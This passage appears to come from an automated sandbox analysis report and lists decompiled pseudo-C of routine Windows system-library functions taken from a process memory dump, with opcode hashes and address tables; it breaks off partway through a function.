                                                              0x04bcbd09
                                                              0x00000000
                                                              0x04bcbd09
                                                              0x04bcbcb1
                                                              0x04bcbcb5
                                                              0x04bcbcbb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bcbcbb

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bab5d4c655513bfa016332a7f39d850064da62c935abf9570af47f8bde39540
                                                              • Instruction ID: b7e212b5e9a5c39464591d21231337f6c448227393655ed12536faad7799bd2f
                                                              • Opcode Fuzzy Hash: 2bab5d4c655513bfa016332a7f39d850064da62c935abf9570af47f8bde39540
                                                              • Instruction Fuzzy Hash: D931FD3AA046159BDB01EF98E4C1BAA73A5EB18315F0040BDE845DB242EB78FD05AB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04B99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                              				signed int _t53;
                                                              				signed int _t56;
                                                              				signed int* _t60;
                                                              				signed int _t63;
                                                              				signed int _t66;
                                                              				signed int _t69;
                                                              				void* _t70;
                                                              				intOrPtr* _t72;
                                                              				void* _t78;
                                                              				void* _t79;
                                                              				signed int _t80;
                                                              				intOrPtr _t82;
                                                              				void* _t85;
                                                              				void* _t88;
                                                              				void* _t89;
                                                              
                                                              				_t84 = __esi;
                                                              				_t70 = __ecx;
                                                              				_t68 = __ebx;
                                                              				_push(0x2c);
                                                              				_push(0x4c6f6e8);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((char*)(_t85 - 0x1d)) = 0;
                                                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              				if(_t82 == 0) {
                                                              					L4:
                                                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                              						E04C688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                              					}
                                                              					L5:
                                                              					return E04BED130(_t68, _t82, _t84);
                                                              				}
                                                              				_t88 = _t82 -  *0x4c886c0; // 0x2e607b0
                                                              				if(_t88 == 0) {
                                                              					goto L4;
                                                              				}
                                                              				_t89 = _t82 -  *0x4c886b8; // 0x0
                                                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					goto L4;
                                                              				} else {
                                                              					E04BB2280(_t82 + 0xe0, _t82 + 0xe0);
                                                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                              					__eflags =  *((char*)(_t82 + 0xe5));
                                                              					if(__eflags != 0) {
                                                              						E04C688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                              						goto L12;
                                                              					} else {
                                                              						__eflags =  *((char*)(_t82 + 0xe4));
                                                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                              							 *((char*)(_t82 + 0xe4)) = 1;
                                                              							_push(_t82);
                                                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                              							E04BDAFD0();
                                                              						}
                                                              						while(1) {
                                                              							_t60 = _t82 + 8;
                                                              							 *(_t85 - 0x2c) = _t60;
                                                              							_t68 =  *_t60;
                                                              							_t80 = _t60[1];
                                                              							 *(_t85 - 0x28) = _t68;
                                                              							 *(_t85 - 0x24) = _t80;
                                                              							while(1) {
                                                              								L10:
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t84 = _t68;
                                                              								 *(_t85 - 0x30) = _t80;
                                                              								 *(_t85 - 0x24) = _t80 - 1;
                                                              								asm("lock cmpxchg8b [edi]");
                                                              								_t68 = _t84;
                                                              								 *(_t85 - 0x28) = _t68;
                                                              								 *(_t85 - 0x24) = _t80;
                                                              								__eflags = _t68 - _t84;
                                                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              								if(_t68 != _t84) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80 -  *(_t85 - 0x30);
                                                              								if(_t80 !=  *(_t85 - 0x30)) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t63 = 0;
                                                              								 *(_t85 - 0x34) = 0;
                                                              								_t84 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									 *(_t85 - 0x3c) = _t84;
                                                              									__eflags = _t84 - 3;
                                                              									if(_t84 >= 3) {
                                                              										break;
                                                              									}
                                                              									__eflags = _t63;
                                                              									if(_t63 != 0) {
                                                              										L40:
                                                              										_t84 =  *_t63;
                                                              										__eflags = _t84;
                                                              										if(_t84 != 0) {
                                                              											_t84 =  *(_t84 + 4);
                                                              											__eflags = _t84;
                                                              											if(_t84 != 0) {
                                                              												 *0x4c8b1e0(_t63, _t82);
                                                              												 *_t84();
                                                              											}
                                                              										}
                                                              										do {
                                                              											_t60 = _t82 + 8;
                                                              											 *(_t85 - 0x2c) = _t60;
                                                              											_t68 =  *_t60;
                                                              											_t80 = _t60[1];
                                                              											 *(_t85 - 0x28) = _t68;
                                                              											 *(_t85 - 0x24) = _t80;
                                                              											goto L10;
                                                              										} while (_t63 == 0);
                                                              										goto L40;
                                                              									}
                                                              									_t69 = 0;
                                                              									__eflags = 0;
                                                              									while(1) {
                                                              										 *(_t85 - 0x38) = _t69;
                                                              										__eflags = _t69 -  *0x4c884c0;
                                                              										if(_t69 >=  *0x4c884c0) {
                                                              											break;
                                                              										}
                                                              										__eflags = _t63;
                                                              										if(_t63 != 0) {
                                                              											break;
                                                              										}
                                                              										_t66 = E04C69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                              										__eflags = _t66;
                                                              										if(_t66 == 0) {
                                                              											_t63 = 0;
                                                              											__eflags = 0;
                                                              										} else {
                                                              											_t63 = _t66 + 0xfffffff4;
                                                              										}
                                                              										 *(_t85 - 0x34) = _t63;
                                                              										_t69 = _t69 + 1;
                                                              									}
                                                              									_t84 = _t84 + 1;
                                                              								}
                                                              								__eflags = _t63;
                                                              							}
                                                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                              							 *((char*)(_t82 + 0xe5)) = 1;
                                                              							 *((char*)(_t85 - 0x1d)) = 1;
                                                              							L12:
                                                              							 *(_t85 - 4) = 0xfffffffe;
                                                              							E04B9922A(_t82);
                                                              							_t53 = E04BB7D50();
                                                              							__eflags = _t53;
                                                              							if(_t53 != 0) {
                                                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              							} else {
                                                              								_t56 = 0x7ffe0386;
                                                              							}
                                                              							__eflags =  *_t56;
                                                              							if( *_t56 != 0) {
                                                              								_t56 = E04C68B58(_t82);
                                                              							}
                                                              							__eflags =  *((char*)(_t85 - 0x1d));
                                                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                              								__eflags = _t82 -  *0x4c886c0; // 0x2e607b0
                                                              								if(__eflags != 0) {
                                                              									__eflags = _t82 -  *0x4c886b8; // 0x0
                                                              									if(__eflags == 0) {
                                                              										_t79 = 0x4c886bc;
                                                              										_t72 = 0x4c886b8;
                                                              										goto L18;
                                                              									}
                                                              									__eflags = _t56 | 0xffffffff;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										E04B99240(_t68, _t82, _t82, _t84, __eflags);
                                                              									}
                                                              								} else {
                                                              									_t79 = 0x4c886c4;
                                                              									_t72 = 0x4c886c0;
                                                              									L18:
                                                              									E04BC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                              								}
                                                              							}
                                                              							goto L5;
                                                              						}
                                                              					}
                                                              				}
                                                              			}


















                                                              0x04b99100
                                                              0x04b99100
                                                              0x04b99100
                                                              0x04b99100
                                                              0x04b99102
                                                              0x04b99107
                                                              0x04b9910c
                                                              0x04b99110
                                                              0x04b99115
                                                              0x04b99136
                                                              0x04b99143
                                                              0x04bf37e4
                                                              0x04bf37e4
                                                              0x04b99149
                                                              0x04b9914e
                                                              0x04b9914e
                                                              0x04b99117
                                                              0x04b9911d
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9911f
                                                              0x04b99125
                                                              0x00000000
                                                              0x04b99151
                                                              0x04b99158
                                                              0x04b9915d
                                                              0x04b99161
                                                              0x04b99168
                                                              0x04bf3715
                                                              0x00000000
                                                              0x04b9916e
                                                              0x04b9916e
                                                              0x04b99175
                                                              0x04b99177
                                                              0x04b9917e
                                                              0x04b9917f
                                                              0x04b99182
                                                              0x04b99182
                                                              0x04b99187
                                                              0x04b99187
                                                              0x04b9918a
                                                              0x04b9918d
                                                              0x04b9918f
                                                              0x04b99192
                                                              0x04b99195
                                                              0x04b99198
                                                              0x04b99198
                                                              0x04b99198
                                                              0x04b9919a
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf371f
                                                              0x04bf3721
                                                              0x04bf3727
                                                              0x04bf372f
                                                              0x04bf3733
                                                              0x04bf3735
                                                              0x04bf3738
                                                              0x04bf373b
                                                              0x04bf373d
                                                              0x04bf3740
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3746
                                                              0x04bf3749
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf374f
                                                              0x04bf3751
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3757
                                                              0x04bf3759
                                                              0x04bf375c
                                                              0x04bf375c
                                                              0x04bf375e
                                                              0x04bf375e
                                                              0x04bf3761
                                                              0x04bf3764
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3766
                                                              0x04bf3768
                                                              0x04bf37a3
                                                              0x04bf37a3
                                                              0x04bf37a5
                                                              0x04bf37a7
                                                              0x04bf37ad
                                                              0x04bf37b0
                                                              0x04bf37b2
                                                              0x04bf37bc
                                                              0x04bf37c2
                                                              0x04bf37c2
                                                              0x04bf37b2
                                                              0x04b99187
                                                              0x04b99187
                                                              0x04b9918a
                                                              0x04b9918d
                                                              0x04b9918f
                                                              0x04b99192
                                                              0x04b99195
                                                              0x00000000
                                                              0x04b99195
                                                              0x00000000
                                                              0x04b99187
                                                              0x04bf376a
                                                              0x04bf376a
                                                              0x04bf376c
                                                              0x04bf376c
                                                              0x04bf376f
                                                              0x04bf3775
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3777
                                                              0x04bf3779
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf3782
                                                              0x04bf3787
                                                              0x04bf3789
                                                              0x04bf3790
                                                              0x04bf3790
                                                              0x04bf378b
                                                              0x04bf378b
                                                              0x04bf378b
                                                              0x04bf3792
                                                              0x04bf3795
                                                              0x04bf3795
                                                              0x04bf3798
                                                              0x04bf3798
                                                              0x04bf379b
                                                              0x04bf379b
                                                              0x04b991a3
                                                              0x04b991a9
                                                              0x04b991b0
                                                              0x04b991b4
                                                              0x04b991b4
                                                              0x04b991bb
                                                              0x04b991c0
                                                              0x04b991c5
                                                              0x04b991c7
                                                              0x04bf37da
                                                              0x04b991cd
                                                              0x04b991cd
                                                              0x04b991cd
                                                              0x04b991d2
                                                              0x04b991d5
                                                              0x04b99239
                                                              0x04b99239
                                                              0x04b991d7
                                                              0x04b991db
                                                              0x04b991e1
                                                              0x04b991e7
                                                              0x04b991fd
                                                              0x04b99203
                                                              0x04b9921e
                                                              0x04b99223
                                                              0x00000000
                                                              0x04b99223
                                                              0x04b99205
                                                              0x04b99208
                                                              0x04b9920c
                                                              0x04b99214
                                                              0x04b99214
                                                              0x04b991e9
                                                              0x04b991e9
                                                              0x04b991ee
                                                              0x04b991f3
                                                              0x04b991f3
                                                              0x04b991f3
                                                              0x04b991e7
                                                              0x00000000
                                                              0x04b991db
                                                              0x04b99187
                                                              0x04b99168

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87d68eb588c3ad2091b9cdb74ddfd1885e2b9865a0ad5540c4fb9f8b3c7124c2
                                                              • Instruction ID: a382bef9388c46ab40e7a215d6e0d2006e04c45889769509a1a869de9cdb0933
                                                              • Opcode Fuzzy Hash: 87d68eb588c3ad2091b9cdb74ddfd1885e2b9865a0ad5540c4fb9f8b3c7124c2
                                                              • Instruction Fuzzy Hash: BD319CB5A01655AFEF65EF68C488BACB7F1FB48354F1881ADC40567341C334BD908B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E04BB0050(void* __ecx) {
                                                              				signed int _v8;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr* _t30;
                                                              				intOrPtr* _t31;
                                                              				signed int _t34;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              				signed int _t44;
                                                              				intOrPtr _t47;
                                                              				signed int _t58;
                                                              				void* _t59;
                                                              				void* _t61;
                                                              				void* _t62;
                                                              				signed int _t64;
                                                              
                                                              				_push(__ecx);
                                                              				_v8 =  *0x4c8d360 ^ _t64;
                                                              				_t61 = __ecx;
                                                              				_t2 = _t61 + 0x20; // 0x20
                                                              				E04BC9ED0(_t2, 1, 0);
                                                              				_t52 =  *(_t61 + 0x8c);
                                                              				_t4 = _t61 + 0x8c; // 0x8c
                                                              				_t40 = _t4;
                                                              				do {
                                                              					_t44 = _t52;
                                                              					_t58 = _t52 & 0x00000001;
                                                              					_t24 = _t44;
                                                              					asm("lock cmpxchg [ebx], edx");
                                                              					_t52 = _t44;
                                                              				} while (_t52 != _t44);
                                                              				if(_t58 == 0) {
                                                              					L7:
                                                              					_pop(_t59);
                                                              					_pop(_t62);
                                                              					_pop(_t41);
                                                              					return E04BDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                              				}
                                                              				asm("lock xadd [esi], eax");
                                                              				_t47 =  *[fs:0x18];
                                                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t30 != 0) {
                                                              					if( *_t30 == 0) {
                                                              						goto L4;
                                                              					}
                                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					L5:
                                                              					if( *_t31 != 0) {
                                                              						_t18 = _t61 + 0x78; // 0x78
                                                              						E04C68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                              					}
                                                              					_t52 =  *(_t61 + 0x5c);
                                                              					_t11 = _t61 + 0x78; // 0x78
                                                              					_t34 = E04BC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                              					_t24 = _t34 | 0xffffffff;
                                                              					asm("lock xadd [esi], eax");
                                                              					if((_t34 | 0xffffffff) == 0) {
                                                              						 *0x4c8b1e0(_t61);
                                                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              				L4:
                                                              				_t31 = 0x7ffe0386;
                                                              				goto L5;
                                                              			}




















                                                              0x04bb0055
                                                              0x04bb005d
                                                              0x04bb0062
                                                              0x04bb006c
                                                              0x04bb006f
                                                              0x04bb0074
                                                              0x04bb007a
                                                              0x04bb007a
                                                              0x04bb0080
                                                              0x04bb0080
                                                              0x04bb0087
                                                              0x04bb008d
                                                              0x04bb008f
                                                              0x04bb0093
                                                              0x04bb0095
                                                              0x04bb009b
                                                              0x04bb00f8
                                                              0x04bb00fb
                                                              0x04bb00fc
                                                              0x04bb00ff
                                                              0x04bb0108
                                                              0x04bb0108
                                                              0x04bb00a2
                                                              0x04bb00a6
                                                              0x04bb00b3
                                                              0x04bb00bc
                                                              0x04bb00c5
                                                              0x04bb00ca
                                                              0x04bfc01e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bfc02d
                                                              0x04bb00d5
                                                              0x04bb00d9
                                                              0x04bfc03d
                                                              0x04bfc046
                                                              0x04bfc046
                                                              0x04bb00df
                                                              0x04bb00e2
                                                              0x04bb00ea
                                                              0x04bb00ef
                                                              0x04bb00f2
                                                              0x04bb00f6
                                                              0x04bb0111
                                                              0x04bb0117
                                                              0x04bb0117
                                                              0x00000000
                                                              0x04bb00f6
                                                              0x04bb00d0
                                                              0x04bb00d0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af1a2b5ff84426b8946da3a7cc785026c510542ecdb64bd6e2567927a98e1995
                                                              • Instruction ID: 4e3b0c1777b198d297521d3fad4caefb5162150f13598d4ac333902198495535
                                                              • Opcode Fuzzy Hash: af1a2b5ff84426b8946da3a7cc785026c510542ecdb64bd6e2567927a98e1995
                                                              • Instruction Fuzzy Hash: D2314B31601A088FD725DF28C844BA7B7E5FB88718F1445ADE99A87690EA75B801DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E04C16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                              				signed short* _v8;
                                                              				signed char _v12;
                                                              				void* _t22;
                                                              				signed char* _t23;
                                                              				intOrPtr _t24;
                                                              				signed short* _t44;
                                                              				void* _t47;
                                                              				signed char* _t56;
                                                              				signed char* _t58;
                                                              
                                                              				_t48 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t44 = __ecx;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t22 = E04BB7D50();
                                                              				_t58 = 0x7ffe0384;
                                                              				if(_t22 == 0) {
                                                              					_t23 = 0x7ffe0384;
                                                              				} else {
                                                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				}
                                                              				if( *_t23 != 0) {
                                                              					_t24 =  *0x4c87b9c; // 0x0
                                                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                              					_t23 = L04BB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                              					_t56 = _t23;
                                                              					if(_t56 != 0) {
                                                              						_t56[0x24] = _a4;
                                                              						_t56[0x28] = _a8;
                                                              						_t56[6] = 0x1420;
                                                              						_t56[0x20] = _v12;
                                                              						_t14 =  &(_t56[0x2c]); // 0x2c
                                                              						E04BDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						}
                                                              						_push(_t56);
                                                              						_push(_t47 - 0x20);
                                                              						_push(0x402);
                                                              						_push( *_t58 & 0x000000ff);
                                                              						E04BD9AE0();
                                                              						_t23 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                              					}
                                                              				}
                                                              				return _t23;
                                                              			}












                                                              0x04c16c0a
                                                              0x04c16c0f
                                                              0x04c16c10
                                                              0x04c16c13
                                                              0x04c16c15
                                                              0x04c16c19
                                                              0x04c16c1c
                                                              0x04c16c21
                                                              0x04c16c28
                                                              0x04c16c3a
                                                              0x04c16c2a
                                                              0x04c16c33
                                                              0x04c16c33
                                                              0x04c16c3f
                                                              0x04c16c48
                                                              0x04c16c4d
                                                              0x04c16c60
                                                              0x04c16c65
                                                              0x04c16c69
                                                              0x04c16c73
                                                              0x04c16c79
                                                              0x04c16c7f
                                                              0x04c16c86
                                                              0x04c16c90
                                                              0x04c16c94
                                                              0x04c16ca6
                                                              0x04c16cb2
                                                              0x04c16cbd
                                                              0x04c16cbd
                                                              0x04c16cc3
                                                              0x04c16cc7
                                                              0x04c16ccb
                                                              0x04c16cd0
                                                              0x04c16cd1
                                                              0x04c16ce2
                                                              0x04c16ce2
                                                              0x04c16c69
                                                              0x04c16ced

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d98a8f7cb26868bb31187d7f95e44bbce2d347af22c24695bb2c18bf743dd61d
                                                              • Instruction ID: b3eb63bd69726c4e1fc235daa4aa2e78a884c78c73aa079ed4bfbf9db77683f4
                                                              • Opcode Fuzzy Hash: d98a8f7cb26868bb31187d7f95e44bbce2d347af22c24695bb2c18bf743dd61d
                                                              • Instruction Fuzzy Hash: 6D219CB1A00644ABD711DB69D840F6AB7A8FF48744F1440A9F805C77A1EA34ED10DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E04BD90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                              				intOrPtr* _v0;
                                                              				void* _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				char _v36;
                                                              				void* _t38;
                                                              				intOrPtr _t41;
                                                              				void* _t44;
                                                              				signed int _t45;
                                                              				intOrPtr* _t49;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				intOrPtr* _t59;
                                                              				void* _t62;
                                                              				void* _t63;
                                                              				void* _t65;
                                                              				void* _t66;
                                                              				signed int _t69;
                                                              				intOrPtr* _t70;
                                                              				void* _t71;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t73;
                                                              				char _t74;
                                                              
                                                              				_t65 = __edx;
                                                              				_t57 = _a4;
                                                              				_t32 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t3 = _t32 + 0x14c; // 0x14c
                                                              				_t70 = _t3;
                                                              				_v16 = __ecx;
                                                              				_t72 =  *_t70;
                                                              				while(_t72 != _t70) {
                                                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                              						L24:
                                                              						_t72 =  *_t72;
                                                              						continue;
                                                              					}
                                                              					_t30 = _t72 + 0x10; // 0x10
                                                              					if(E04BED4F0(_t30, _t65, _t57) == _t57) {
                                                              						return 0xb7;
                                                              					}
                                                              					_t65 = _v8;
                                                              					goto L24;
                                                              				}
                                                              				_t61 = _t57;
                                                              				_push( &_v12);
                                                              				_t66 = 0x10;
                                                              				if(E04BCE5E0(_t57, _t66) < 0) {
                                                              					return 0x216;
                                                              				}
                                                              				_t73 = L04BB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                              				if(_t73 == 0) {
                                                              					_t38 = 0xe;
                                                              					return _t38;
                                                              				}
                                                              				_t9 = _t73 + 0x10; // 0x10
                                                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                              				E04BDF3E0(_t9, _v8, _t57);
                                                              				_t41 =  *_t70;
                                                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                              					_t62 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t62);
                                                              					_push(_t57);
                                                              					_push(_t73);
                                                              					_push(_t70);
                                                              					_t71 = _t62;
                                                              					_t74 = 0;
                                                              					_v36 = 0;
                                                              					_t63 = E04BCA2F0(_t62, _t71, 1, 6,  &_v36);
                                                              					if(_t63 == 0) {
                                                              						L20:
                                                              						_t44 = 0x57;
                                                              						return _t44;
                                                              					}
                                                              					_t45 = _v12;
                                                              					_t58 = 0x1c;
                                                              					if(_t45 < _t58) {
                                                              						goto L20;
                                                              					}
                                                              					_t69 = _t45 / _t58;
                                                              					if(_t69 == 0) {
                                                              						L19:
                                                              						return 0xe8;
                                                              					}
                                                              					_t59 = _v0;
                                                              					do {
                                                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                              							goto L18;
                                                              						}
                                                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                              						 *_t59 = _t49;
                                                              						if( *_t49 != 0x53445352) {
                                                              							goto L18;
                                                              						}
                                                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                              						return 0;
                                                              						L18:
                                                              						_t63 = _t63 + 0x1c;
                                                              						_t74 = _t74 + 1;
                                                              					} while (_t74 < _t69);
                                                              					goto L19;
                                                              				}
                                                              				 *_t73 = _t41;
                                                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                              				 *_t70 = _t73;
                                                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                              				return 0;
                                                              			}


























                                                              0x04bd90af
                                                              0x04bd90b8
                                                              0x04bd90bb
                                                              0x04bd90bf
                                                              0x04bd90c2
                                                              0x04bd90c2
                                                              0x04bd90c8
                                                              0x04bd90cb
                                                              0x04bd90cd
                                                              0x04c114d7
                                                              0x04c114eb
                                                              0x04c114eb
                                                              0x00000000
                                                              0x04c114eb
                                                              0x04c114db
                                                              0x04c114e6
                                                              0x00000000
                                                              0x04c114f2
                                                              0x04c114e8
                                                              0x00000000
                                                              0x04c114e8
                                                              0x04bd90d8
                                                              0x04bd90da
                                                              0x04bd90dd
                                                              0x04bd90e5
                                                              0x00000000
                                                              0x04bd9139
                                                              0x04bd90fa
                                                              0x04bd90fe
                                                              0x04bd9142
                                                              0x00000000
                                                              0x04bd9142
                                                              0x04bd9104
                                                              0x04bd9107
                                                              0x04bd910b
                                                              0x04bd9110
                                                              0x04bd9118
                                                              0x04bd9147
                                                              0x04bd9148
                                                              0x04bd914f
                                                              0x04bd9150
                                                              0x04bd9151
                                                              0x04bd9152
                                                              0x04bd9156
                                                              0x04bd915d
                                                              0x04bd9160
                                                              0x04bd9168
                                                              0x04bd916c
                                                              0x04bd91bc
                                                              0x04bd91be
                                                              0x00000000
                                                              0x04bd91be
                                                              0x04bd916e
                                                              0x04bd9173
                                                              0x04bd9176
                                                              0x00000000
                                                              0x00000000
                                                              0x04bd917c
                                                              0x04bd9180
                                                              0x04bd91b5
                                                              0x00000000
                                                              0x04bd91b5
                                                              0x04bd9182
                                                              0x04bd9185
                                                              0x04bd9189
                                                              0x00000000
                                                              0x00000000
                                                              0x04bd918e
                                                              0x04bd9190
                                                              0x04bd9198
                                                              0x00000000
                                                              0x00000000
                                                              0x04bd91a0
                                                              0x00000000
                                                              0x04bd91ad
                                                              0x04bd91ad
                                                              0x04bd91b0
                                                              0x04bd91b1
                                                              0x00000000
                                                              0x04bd9185
                                                              0x04bd911a
                                                              0x04bd911c
                                                              0x04bd911f
                                                              0x04bd9125
                                                              0x04bd9127
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction ID: f632020854621b25bcc96ecc254ef51395dd36bca1ccb5964e58fb7e74f4c29b
                                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction Fuzzy Hash: 82219FB1A00605EFDB21DF59C844EAAF7F8EB48714F1488EAE949A7210E774FD10DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04BC3B7A(void* __ecx) {
                                                              				signed int _v8;
                                                              				char _v12;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t26;
                                                              				void* _t35;
                                                              				void* _t38;
                                                              				void* _t41;
                                                              				intOrPtr _t44;
                                                              
                                                              				_t17 =  *0x4c884c4; // 0x0
                                                              				_v12 = 1;
                                                              				_v8 =  *0x4c884c0 * 0x4c;
                                                              				_t41 = __ecx;
                                                              				_t35 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4c884c0 * 0x4c);
                                                              				if(_t35 == 0) {
                                                              					_t44 = 0xc0000017;
                                                              				} else {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t35);
                                                              					_push(4);
                                                              					_push( &_v12);
